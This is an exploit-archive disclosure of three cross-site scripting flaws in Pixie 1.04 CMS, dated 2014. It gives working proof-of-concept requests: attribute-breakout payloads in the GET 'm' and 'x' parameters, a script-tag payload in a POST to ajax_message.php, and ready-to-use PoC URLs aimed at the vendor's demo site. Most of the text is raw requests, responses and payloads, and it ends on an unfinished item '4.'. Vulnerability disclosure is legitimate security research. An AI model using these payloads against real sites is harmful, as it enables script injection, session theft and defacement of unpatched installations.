Pixie 1.04 CMS - Multiple XSS Vulnerabilities

#Title: Pixie 1.04 CMS - Multiple XSS
#Version: 1.04 (Latest ATM)
#Vendor: getpixie.co.uk
#Demo: demo.getpixie.co.uk
#Date: 01.26.2014
#Contact: smash[at]devilteam.pl

1. Cross Site Scripting - GET 'm' parameter

Request:
host/?s=login&m=forgotten" onload=alert(666) bad="

Injection point:
<body class="pixie y2014 m1 d26 h12 s_login m_forgotten\" onload=alert(666) bad=\"">

PoC:
demo.getpixie.co.uk/admin/?s=login&m=forgotten" onload=alert(666) bad="

2. Cross Site Scripting - POST message

Request:
POST /admin/admin/modules/ajax_message.php HTTP/1.1
Host: demo.getpixie.co.uk

message=<script>alert(666)</script>

Response:
HTTP/1.1 200 OK
Date: Sun, 26 Jan 2014 12:08:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.28
Cache-Control: max-age=1
Expires: Sun, 26 Jan 2014 12:08:10 GMT
Content-Length: 264
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


				<span class="message_text_error"><img src="admin/theme/images/icons/error.png" /><script>alert(666)</script></span><span class="message_back"> (<a href="javascript:history.go(-1);" title="Back (Will reload any submitted form data)">go back &raquo;</a>)</span>

3. Cross Site Scripting - GET 'x' parameter

Request:
host/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78

Injection point:

<body class="pixie y2014 m1 d26 h12 s_login m_static x_page-1\" onload=alert(666) bad=\"">
(...)
<script type="text/javascript" src="jscript/pixie.js.php?s=login&amp;x=page-1\" onload=alert(666) bad=\"&amp;advmode=Toggle advanced Mode"></script>

PoC:
demo.getpixie.co.uk/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78

4.

#  0day.today [2018-02-16]  #